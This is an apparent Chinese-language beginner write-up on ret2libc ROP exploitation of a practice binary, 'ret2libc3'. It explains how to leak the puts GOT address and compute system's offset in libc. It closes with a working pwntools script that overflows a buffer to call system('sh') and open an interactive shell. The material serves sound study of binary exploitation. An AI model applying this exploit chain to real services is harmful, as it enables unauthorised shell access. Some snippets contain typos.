ret2libc--ROP(pwn)漏洞入门分析

背景知识

fflush 函数，清理缓冲区。
fflush(stdout) 一次性输出以上缓冲区所有数据
read(0,&buf,0xAu) 0代表标准输入，标准输出1，标准错误2，&buf 向buf输入。输入 长度为A的值的长度,数据类型U代表的是无符int
strtol(&buf,v3,v4) 是将输入的数据的ASCII码转换成数值存入 buf 中去
在read 中接受的是ascii码，所以使用python方法应该是 io.send(str('某个地址'))
使用got 查看运行的GOt 表中的信息
其中0x80 开始的就是未加载的表象地址。而0xf 开始一般都是libc中的地址

由上图可以看出，在 plt 中无 system 函数

利用查找字符串也未发现 /bin/sh

构建shell思路

当调试的时候查询到 puts 函数的时候，因为在 libc 中是固定的， 所以system 相对于puts 的位置是固定的，得到了puts 的地址加上偏移量即可获得system 地址
libc=ELF('./libc-2.23.so')
libc.symbols["system"] //获取方法和获取当前变量一样
libc.symbols["puts"]
同样也可以使用ida进行获取

puts

相差的绝对值为 system - puts =
获取 puts 的 Got 地址。

---

from pwn import *
io=process('./ret2libc3')
elf=ELF('./ret2libc3')
elf.got['puts']

---

获得elf中put的 puts 地址 134520860
将该值传到服务器(这里是本地进程)

See_something 函数获取put在远程（这里是本地测试）的地址。

地址为0xf7daecd0 以 f7 开头的一般都是 libc 地址

获取sh 地址

获取到fflush 存储的地址，读取由sh开始的地址，当读取完sh 就会读取到 %00 。

即可完成字符串sh 的读取

netx(elf.search(b"sh\0x00"))

利用链

在复制过程中 src 的内容过长（0x100），导致 dest 之外的内容被覆盖。
src 内容来自于用户输入。
(注:默认情况下使用的libc文件为本机文件，使用ldd ret2libc3 -v查看相关信息)

payload

---

from pwn import *
io=process("./ret2libc3")
elf=ELF("./ret2libc3.1")
libc3=ELF("/lib/i386-linux-gnu/libc.so.6")
io.sendlineafter(" :",str(elf.got["puts"]))
io.recvuntil(b' : ')
puts_addr=int(io.recvuntil(b'\n',drop=True),16)
base_addr=libc3.symbols["system"]-libc3.symbols["puts"]
print(base_addr)
payload=flat(cyclic(60),puts_addr+base_addr,0xdeadbeef,next(elf.search(b"sh\x00")))
print(payload)
io.sendlineafter(b" :",payload)
print(io.recv())
io.interactive()

---